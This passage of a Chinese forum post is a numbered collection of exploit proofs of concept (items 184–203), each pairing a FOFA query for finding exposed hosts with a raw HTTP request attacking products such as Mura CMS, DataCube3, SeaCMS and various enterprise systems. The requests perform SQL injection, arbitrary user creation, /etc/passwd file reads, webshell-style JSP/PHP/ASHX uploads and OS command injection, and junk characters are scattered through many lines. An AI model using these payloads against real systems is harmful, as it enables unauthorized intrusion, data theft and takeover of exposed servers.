) a; ]5 |* B9 H- f$ m- Q/ j184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
. X& c! n& U; X% D9 a  FFOFA:server="SunFull-Webs"
/ }1 R2 \5 Y6 n6 @0 iPOST /soap/AddUser HTTP/1.1* G9 A6 ^, s0 d+ p& d; S) Q3 Y
Host: your-ip* K) M* R) n0 `
Accept-Encoding: gzip, deflate$ L: ~! l9 V% w: t4 T: _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
& d- w1 p4 u7 }$ X2 \  h( VAccept: application/xml, text/xml, */*; q=0.01
: @$ c8 y& j4 d* eContent-Type: text/xml; charset=utf-8
9 [/ A4 P$ P( I$ v5 O7 g6 [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 @% }' J/ l; _0 \' \; \' d9 o# u  t  D
X-Requested-With: XMLHttpRequest9 Q4 l0 A# W2 D# [2 N; E

+ ^( P; ]! g8 R; s& M& V  }
: t+ L+ {2 c& q' V% `insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')% @  ^$ u. K* V# Y0 d7 h9 C3 m

7 z- T7 o0 f. |  C1 ^# w; F9 h" b1 X! b, l6 f, l
185. 瑞友天翼应用虚拟化系统SQL注入
4 k* t) @+ y% A6 N; Xversion < 7.0.5.17 q9 b% u5 S2 K
FOFA:app="REALOR-天翼应用虚拟化系统"
; q& j* K5 P  o+ V4 B$ M2 T+ @GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
! P0 f$ ^- p; dHost: host
$ r. w1 N0 h# b9 I7 F/ G: _
% G. |/ _5 k: X+ m7 l7 [# V7 g
  ?2 t; V, ^9 i/ I* R4 Y9 j" z$ Q9 N" i186. F-logic DataCube3 SQL注入
- [3 j: _* f& G; y, L) lCVE-2024-31750/ T8 u' j% n: y4 z+ y8 A* M
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
+ J( q! [% v% w4 z' I4 C1 N" iFOFA:title=="DataCube3"  r# H3 \4 q% H( F
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
, H( f* O6 |& S1 ]: ^" iHost: your-ip
2 i0 p! k4 e5 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
! X+ C$ r. o5 W$ Y0 d  bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8- u; q- K$ u% a7 [1 \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 B. z1 o8 \. I* O1 b% J. FAccept-Encoding: gzip, deflate
# h& p/ M/ t5 _/ u1 nConnection: close$ s$ d' G/ v' A, g9 O6 I
Content-Type: application/x-www-form-urlencoded
3 g: h6 C7 }/ `5 w+ a; Q! i
4 V* n) ?5 i+ Q% v) Creq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
1 K2 q$ {* A" y0 D2 _- S$ V9 v' R+ _' ^

. v" M+ R) N2 \; B' n187. Mura CMS processAsyncObject SQL注入
7 T1 M6 j0 p7 m: s9 y  yCVE-2024-32640+ y4 j. F) q) A* d) k
FOFA:"Mura CMS"
) [5 T( c7 g" k3 qPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.14 w& R! m( P0 @: ?4 b
Host: your-ip# P+ g7 t; t  l# q4 U$ h
Content-Type: application/x-www-form-urlencoded8 x8 {) s8 x0 Q' l0 D
1 r" H) {: C/ i) e2 q

7 S8 m# d3 ~4 U3 J) G" [0 v" G& C2 N! hobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
8 h# D- H. X1 z' p7 W% M1 C
% E/ l/ p" U$ f* S
8 f) j* J; g, e! M) [: z0 D- e188. 叁体-佳会视频会议 attachment 任意文件读取( p0 b" Z; N1 D8 p
version <= 3.9.78 x: y9 Z# A! A% p5 [7 Z
FOFA:body="/system/get_rtc_user_defined_info?site_id"# h) \# J$ o1 U6 [4 x, v7 r- p) N
GET /attachment?file=/etc/passwd HTTP/1.1, \2 M& W% l3 \. X; u& e- D! H
Host: your-ip; l, g* c/ O6 j* n% Y9 ~: |8 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 b8 X2 T+ k6 g3 N8 k7 O& A6 hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 g: B/ L, Y! H6 jAccept-Encoding: gzip, deflate
, F* p$ t# _4 c7 ?& qAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
8 l" Z6 P: b+ ?, [; v% {5 [Connection: close
2 R( ^7 b& Q! c, Z% V: l+ w% e8 p0 Z4 V/ L& v; G
+ O1 h$ P3 Y& v% J' I( ^- P3 ]
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
5 N; a4 l# N4 Y' y# |# |; X, a: DFOFA:app="LANWON-临床浏览系统"% m, }# o, K) [) _1 i8 i
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1; K1 H" G1 J7 W# _, c$ R# W. M
Host: your-ip% \* T" @4 V; J' x# v
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36, U4 h/ N9 z+ y% U& I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 p, ~; H6 \3 P! w0 \: m- I# c. XAccept-Encoding: gzip, deflate
7 i9 j+ I! k0 i/ Q( O9 X! ^" PAccept-Language: zh-CN,zh;q=0.93 r* x, V* S1 a3 t
Connection: close
5 G! T% t' G! |# V; Y
# W" b, K- d( j* M' x) R( L- M4 v4 Z+ t0 I  p. I
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
8 \7 c4 q0 V- C9 P3 vFOFA:title=="短视频矩阵营销系统"
4 C! m' G8 M9 BPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
- o4 e7 P" r0 t7 V. C$ Z& qHost: your-ip9 r- n8 t( z5 \6 l! v- v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36) }+ T  k$ Y6 G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9% Z6 p$ h. z2 M9 l
Content-Type: application/x-www-form-urlencoded
1 O; M5 K+ Y9 ?& `$ ]! cAccept-Encoding: gzip, deflate
. V7 F. A2 N; W7 YAccept-Language: zh-CN,zh;q=0.9
8 F. q3 L2 I6 {! D, B
4 Z9 T" t5 s/ a% ^2 o/ Jpoi=file:///etc/passwd
- `2 {+ o# u4 e7 O6 S$ T1 G! O, _  V* k. P
; N# W# U) t0 |3 V
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入: o' f+ W5 [- Y' \6 d
FOFA:body="/CDGServer3/index.jsp"6 q) h% c- y# M6 J$ Y5 h' J! v
POST /CDGServer3/js/../NavigationAjax HTTP/1.1) `1 s1 I( t. ~6 ^
Host: your-ip$ M0 _! k& R# [* k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- y/ P( P3 M) ]* ]- d  T( d* T
Content-Type: application/x-www-form-urlencoded7 G2 i* G+ M6 @. U+ P3 @

# n3 K( G& C( K' H1 t8 ^  S+ Jcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
# h9 O% T& C: c. F: ?1 t6 v2 Y7 ~
0 d0 S+ H) k7 U% I: ^3 ~8 ~5 n, X( r
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
$ e9 F8 r( M( Y9 y9 u5 E' q% |0 }7 CFOFA:title="用户登录_富通天下外贸ERP"
5 ?; r. R8 g) V7 @9 y) C7 pPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
3 h& o' \" ], ]Host: your-ip
6 V4 I: G" z' t8 B& o7 LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
2 P. k( M% e& B* j* R* ~0 ?5 j- uContent-Type: application/x-www-form-urlencoded' w8 I( T5 O4 ^
& l) N; S/ l' C; f- R
( W! b5 P1 _( G$ {2 x
<% @ webhandler language="C#" class="AverageHandler" %>
& b$ b3 Z* v% _8 B, u. f& ^7 V, j; }+ nusing System;# }$ p/ S' e; ^5 V4 e. ?' B5 H) @
using System.Web;
" g: r! X% v& P/ b0 C# Fpublic class AverageHandler : IHttpHandler
) t& F; [8 F6 P" D& m( S. u/ B{0 h) I/ i, E8 @/ {
public bool IsReusable' C& n4 Z! p# U' ~/ N+ x
{ get { return true; } }
$ P+ X' R( T2 b8 z/ ^/ q* rpublic void ProcessRequest(HttpContext ctx)
1 N2 G9 I" X1 B; S% D, h{1 p0 f5 O  a) p
ctx.Response.Write("test");
# l% D0 D4 ]7 k* a' R9 D# O}
. ?4 Z+ s/ c# H8 g5 w' v}
9 G+ D7 i1 s0 Y' |3 V
7 {3 }! j2 j& i. S% z6 ]( r8 H) r/ }: _" J/ t/ w
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行2 \- x5 |: A/ `* w4 p
FOFA:body="山石云鉴主机安全管理系统"
% _1 W- Q+ Q4 Z* {! p3 Q3 I9 xGET /master/ajaxActions/getTokenAction.php HTTP/1.1' q2 H# r: d1 T6 h  D" \5 G
Host:
3 H  U! b" C3 \- h9 u* B' ECookie: PHPSESSID=2333333333333;
* ?4 @& W6 b6 ]+ P& I( O+ aContent-Type: application/x-www-form-urlencoded
. w8 D; `* f; ^9 ^: r; VUser-Agent: Mozilla/5.0
0 }& T$ {9 s' H5 M; A$ F( h1 a  E1 \* f/ p% I# P: E6 R3 N

7 y, o7 J. _- i$ E  k9 [9 vPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1& M; f6 h- V2 ~  _
Host:* w# w/ `3 b  m9 l) U9 y9 Q
User-Agent: Mozilla/5.0
; n* s. b$ k3 `0 G2 ?9 QAccept-Encoding: gzip, deflate
) L, O8 T; Q7 D3 Y! k' n& [) w* lAccept: */*
2 i. B# O0 }* m+ U7 oConnection: close
5 h0 P4 c( t- k2 U. }Cookie: PHPSESSID=2333333333333;
0 h3 f' x$ g5 w7 D# ~Content-Type: application/x-www-form-urlencoded& m3 _/ u2 G4 n  Q& c
Content-Length: 84
" m) S& h0 z* `7 I( y# e, r
. Y- \3 g. Y/ }, bparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
' i% A! y$ ~% R1 c& `; J
$ g% l3 f- p4 G- X
4 E* t0 l6 }$ K( _$ `+ V" x0 sGET /master/img/config HTTP/1.1
! ~- s$ U# n* XHost:
, ~5 S' r2 d0 A* S9 Y- UUser-Agent: Mozilla/5.0- H9 N$ u0 z$ r3 m6 [+ m
+ P1 `9 z9 }6 V5 k
2 Z4 @. [6 {" G( _; @+ N
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
( X9 t2 M+ y( hFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在) T9 v4 `( S% F9 J/ x5 G

9 {4 s" x9 T, @9 c# dPOST /servlet/uploadAttachmentServlet HTTP/1.1( A. z; ^  r' O2 J. A' d
Host: host
" |$ u$ H/ H; K4 x+ T0 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
7 W4 x; w3 ^3 p# i, ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" i/ `9 W9 x* f" K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# A( Q; F. t) K. xAccept-Encoding: gzip, deflate
6 x; g, O, @; l. rConnection: close
2 L, w. T# t% p7 A3 H- [6 u6 F, FContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
% s* B8 o; n% s8 f+ g2 n  U------WebKitFormBoundaryKNt0t4vBe8cX9rZk
0 d% V( [3 T; r# z
+ c! s5 c/ v# I8 i) x) ^0 @  wContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
' W7 D9 k5 c% A, c9 vContent-Type: text/plain
0 q5 \1 U# \/ i/ l' J% X: y/ l<% out.println("hello");%>- D% Q# G& z2 t5 A, P" G
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
+ a2 C, c) I5 Q) ^' l9 @7 v* eContent-Disposition: form-data; name="json"  Q+ o. u9 D1 a0 P- D( J2 e5 P' A
{"iq":{"query":{"UpdateType":"mail"}}}8 {8 t' d6 l, f- ^; W1 ^' W' N
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
$ h8 j) }* C& y( r4 S0 K8 N# w: e
& Z3 E) A( Z! x2 }: T
# _. L$ O" ~  r- z! A' O195. 飞鱼星上网行为管理系统 send_order.cgi命令执行% P" R  L; p6 F0 ]; K* L+ g
FOFA:title=="飞鱼星企业级智能上网行为管理系统& i  M; r; X  j# m4 @: K
POST /send_order.cgi?parameter=operation HTTP/1.1
6 Y/ _1 r* b7 _- `Host: 127.0.0.1
2 x) [2 o: t. f8 sPragma: no-cache
: z9 p9 \" r% S; K& S7 UCache-Control: no-cache5 H# E8 B9 }! H. i6 T: _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.360 Z4 ?: A! D6 U2 S$ K: e: i
Accept: */*
' ]; P) n0 A7 I/ }/ {Accept-Encoding: gzip, deflate7 ?6 `& O+ e. H+ @  E7 p
Accept-Language: zh-CN,zh;q=0.9
5 U: f6 C' U) x/ AConnection: close' b& Z/ {; Y2 o! `* D/ K. @
Content-Type: application/x-www-form-urlencoded
4 q8 J! B9 Q& E/ g/ p* p8 k# SContent-Length: 68
1 m# q! E! v; p" y; H$ h0 a9 [* H1 j3 G) W: x4 d8 G
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}5 s3 N4 V8 X7 }9 M
" Y  z. Q8 c( p2 }
+ k! j1 e  z: z* l, c" A
196. 河南省风速科技统一认证平台密码重置# {, C+ k$ E! e3 J. Q0 f
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
9 h3 \! F% `& h/ {9 E* e" ePOST /cas/userCtl/resetPasswordBySuper HTTP/1.15 e& W( U; p9 N/ _0 o4 _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
" h) u: Q5 w5 aContent-Type: application/json;charset=UTF-89 w! C5 y, F$ _$ v2 [3 {# `6 E
X-Requested-With: XMLHttpRequest! I# M" `9 A: I+ d
Host:5 B9 K# \9 x% v9 q( e
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
6 p8 V# }9 Z. `& m( [/ x, eContent-Length: 45
: r7 s7 j/ b/ M/ [; _Connection: close
+ ~) {5 B- g2 o/ H  _' u  A- O1 L( C+ ^- C$ S
{"xgh":"test","newPass":"test666","email":""}
* x' S' J1 F2 K! W/ }# R+ N7 X( F2 W: O+ }2 U7 k( q, {

4 I4 y8 s- @. @3 D6 C
4 F9 u( r3 k# C0 @, X# _197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
" ^$ j# T) G  |( L4 J. w; r- fFOFA:app="浙大恩特客户资源管理系统"# {! \0 i7 v8 B: P
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
1 C1 Y) A3 g- K* s2 DHost:: _+ l7 @- M- R7 q' \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
1 }. o  }& L' M- i0 D! CAccept-Encoding: gzip, deflate, j9 P+ f8 j  }$ |) C/ |
Connection: close
2 X; y$ c: I4 x! C- @0 W( P6 K: k
+ u% o! r. u/ D" A+ n7 _. P0 l+ q1 y$ H9 S) ?5 c& R8 M' ^7 J

3 r, p) u1 E& E6 F1 D# S! H198.  阿里云盘 WebDAV 命令注入8 a. Y  t& R2 b- U1 n! f' q! _
CVE-2024-29640/ Z5 ]: r* ?0 }
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1/ X: b1 g1 ^7 o2 a% j
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64! k2 y6 t3 L0 @2 T
Accept: */*
7 X( ~: i2 j) w- m6 kAccept-Encoding: gzip, deflate! e: O) g& e) @; ~  H; C
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6% b8 {$ q5 k9 y1 T
Connection: close
5 ^- [7 ?1 K! `" i
' x; Y1 g) k& A6 `% v  C
( f2 b; T9 k1 P! g- d# a; a199. cockpit系统assetsmanager_upload接口 文件上传2 |! |% `* T9 ^/ @& \  }
; n7 P$ n: O6 c* M; B: h6 |
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
4 k: k9 {" K! e0 Z9 CGET /auth/login?to=/ HTTP/1.1
. \' C" N3 M: r! k+ e
% t! R3 G$ @% k% X3 r响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"* h# L! y: Z6 @# \& f/ o) u
) {. ^9 u5 M6 |1 c
2.使用刚才上一步获取到的jwt获取cookie:3 _" B! t: y3 H
7 c. J: O; Z+ V3 ?, R+ @
POST /auth/check HTTP/1.16 ]' D- {4 v2 A6 ]
Content-Type: application/json
' r( s- C$ i% S. D
; R) F+ X3 s& P0 u" t) Z8 Z! D{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
- w: c: w# t" }- r, z1 T/ v8 ]' U* J. e- u4 ^4 [8 U. t
响应:200,返回值:$ l9 f) J8 x& `- n# c& v8 C9 Y
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
  N; ?4 ]. U9 R( q! [7 t/ iFofa:title="Authenticate Please!"# b8 g$ a4 N$ }; @( _( R) v
POST /assetsmanager/upload HTTP/1.1$ R- i$ @- j+ B! c5 Z
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
( `0 V5 {1 {+ f* p5 a+ u& \" qCookie: mysession=95524f01e238bf51bb60d77ede3bea929 r( I! n" N: |" x9 h/ L
+ x" L2 B2 ^/ m. R4 z, o
-----------------------------36D28FBc36bd6feE7Fb3, i! E; q& U1 ^3 K
Content-Disposition: form-data; name="files[]"; filename="tttt.php"$ g9 C* {% q# b9 O9 }$ n
Content-Type: text/php
% g. }4 i3 H- g6 b" B) h: Z% k, V1 }% V4 P
<?php echo "tttt";unlink(__FILE__);?>. l* B9 F& |" Y: q! ]2 H
-----------------------------36D28FBc36bd6feE7Fb3
# `. F. {: V* B$ tContent-Disposition: form-data; name="folder"
& e2 B7 Y6 q& ?3 k; u2 M8 A" e8 x5 o5 ?7 Q& F
-----------------------------36D28FBc36bd6feE7Fb3--' e3 `3 g8 N# q8 e2 E" d

5 C; g9 I3 B* _1 p. q; p' L: D1 @3 v1 y& `. {% R
/storage/uploads/tttt.php
/ b* I4 |3 P& ?
/ u; ^4 |$ L! C& M200. SeaCMS海洋影视管理系统dmku SQL注入
8 z( ~- ?4 I! [- j% I4 |FOFA:app="海洋CMS"4 V/ a8 F7 p, w
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
7 b0 ^5 [& ~8 S$ YCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s+ @4 t* R: h1 p& ]
Upgrade-Insecure-Requests: 1
. w0 a( s$ L( q# ^# z' Y8 @' L$ ICache-Control: max-age=0
& c# ^# @4 o1 ~- h- xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 m7 w2 B1 f5 j' ~/ d5 O
Accept-Encoding: gzip, deflate7 `0 u3 Q, G0 K% h9 |8 w
Accept-Language: zh-CN,zh;q=0.9! T# Z/ R0 ~4 I; M5 Y
3 W; I# k/ y8 l6 g3 d

, i1 H. T, h9 d" W% W4 C* k: K201. 方正全媒体新闻采编系统 binary SQL注入
( |3 q2 a9 T5 V7 dFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"( Y& P& l1 Y! [
POST /newsedit/newsplan/task/binary.do HTTP/1.1" k' A+ k) [) @- |" e9 U* S
Content-Type: application/x-www-form-urlencoded# o# w, r* ^& l. q( e1 _1 P8 T' f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( b, e5 j; O- }/ x  G
Accept-Encoding: gzip, deflate3 y1 {# b9 i# u" ^- @: S
Accept-Language: zh-CN,zh;q=0.9
! V* P  U9 m" @4 QConnection: close
" S0 P# M9 [" P7 k; _$ p) T# V; X! c' L
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
" J( B9 D) z1 c% g* {) V0 f3 T# C! s3 G# J8 K% |. k
" S( ]% a/ c0 @3 V$ K
202. 微擎系统 AccountEdit任意文件上传8 Y( R  s1 @, M
FOFA:body="/Widgets/WidgetCollection/"4 Y3 r% v8 j  _( \# V- O7 V
获取__VIEWSTATE和__EVENTVALIDATION值
  K; u0 c  M' V5 Z4 J8 dGET /User/AccountEdit.aspx HTTP/1.1# ^" W' C1 J8 R9 m. {0 R
Host: 滑板人之家
) X, R, ]6 ^5 X0 d  |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
% F& ~; G$ |4 d( C; f, }4 _Content-Length: 0' N/ y3 z' b: ?0 ?$ Y
4 E9 z" K% x- b+ c4 O- w. y4 j
4 Z9 P3 D9 ]0 j
替换__VIEWSTATE和__EVENTVALIDATION值9 l4 h8 w4 o2 x) M, ]
POST /User/AccountEdit.aspx HTTP/1.1
6 }7 O" h# G& v) r. p4 eAccept-Encoding: gzip, deflate, br6 x3 |9 P3 A! K" o2 Y
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
8 x) x' i, n* ?  m6 b1 N' H/ k: S
  o% U" g$ O9 ~4 T. V-----------------------------786435874t38587593865736587346567358735687* F- _& k5 Y, D' W3 ^
Content-Disposition: form-data; name="__VIEWSTATE"
" v) [4 W6 I. b. N, x
9 _& g) {" y. `! H__VIEWSTATE! J$ ~& ?3 V" q1 ]/ y( p
-----------------------------786435874t38587593865736587346567358735687" n, s, K4 z3 S& o2 q' Y
Content-Disposition: form-data; name="__EVENTVALIDATION"6 X- f# W$ H8 l# x. ?2 }

6 J1 x7 x8 A; R6 A- A__EVENTVALIDATION
- ?& c# X* D3 t3 k% _3 Y% W% p-----------------------------786435874t38587593865736587346567358735687
+ D- g4 I0 Z7 T2 OContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"- E) e8 A9 c# |" o+ q5 K
Content-Type: text/plain
1 v' r8 f- Z3 B) A1 y
  I% [! F7 X$ X6 CHello World!1 f' W* o  S' f
-----------------------------786435874t38587593865736587346567358735687
6 V$ h. s% R6 ^/ G& X8 c7 T5 p5 iContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"3 _; p' h+ m- R# K4 E' C
6 m3 m8 o* ?" N
上传图片
8 e7 R- s: I( Y-----------------------------786435874t38587593865736587346567358735687
0 E$ t9 P/ N; ?6 zContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"& `5 E% `( w& [2 d% {8 |! C' |4 s8 q% p
1 t5 c) Q, T6 c' z% I
* F2 m* T% {" m
-----------------------------786435874t38587593865736587346567358735687; Z4 f( |; m8 c6 D! _: `/ N8 A/ u  T
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
$ W6 }9 p5 G  Y, r; l7 ~- Q, J& W, k  n
2 c+ e( C: v: {4 o/ \
-----------------------------786435874t38587593865736587346567358735687--
, n# ^5 U2 d( L. k/ _# S3 [! `- W& F# i

5 G: E  l- C, Z0 U* D/_data/Uploads/1123.txt& x* j9 H/ h! N# P7 r; J1 v  m

0 f: x& h' s7 O4 |203. 红海云EHR PtFjk 文件上传) |3 ^3 g4 E! {! q* G% x5 O% m
FOFA:body="RedseaPlatform"
3 A2 Z) M/ }$ K. N! M* \' PPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1# P9 Z% m$ W( Z& @& H3 k
Host: x.x.x.x
6 J$ E0 u' G# I1 I9 e' \! S& U. \Accept-Encoding: gzip
( j9 c( J1 n1 f& k& u+ RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" |7 P7 P) q8 z/ J; o. B6 A
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
% A/ g: ]7 O$ Z- p( XContent-Length: 210
, d7 a/ f- z, q  k4 Q( ~1 q; d, P. u# e
------WebKitFormBoundaryt7WbDl1tXogoZys4; B; H- G2 Y* ~& U
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
* J9 r# {( P# }6 J  z7 DContent-Type:image/jpeg7 J. p- y+ P/ D$ `

/ u. [% e/ q" [0 E" Q$ }$ R% l<% out.print("hello,eHR");%>( {+ T% Z0 e, x. {) I' {9 G: Z
------WebKitFormBoundaryt7WbDl1tXogoZys4--
5 I2 @0 m4 _+ U1 Q" ^. s
; A( K3 h+ w" b6 y/ z * w* l/ T0 x/ h+ i( T* _
) X* K. s& X6 j; f0 V9 u$ ?2 M

# Y8 \5 q$ o3 h2 r' f
- |3 ~# D! g1 b0 P" ~6 ?
) d- t: z- H; m( J2 G5 |8 a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表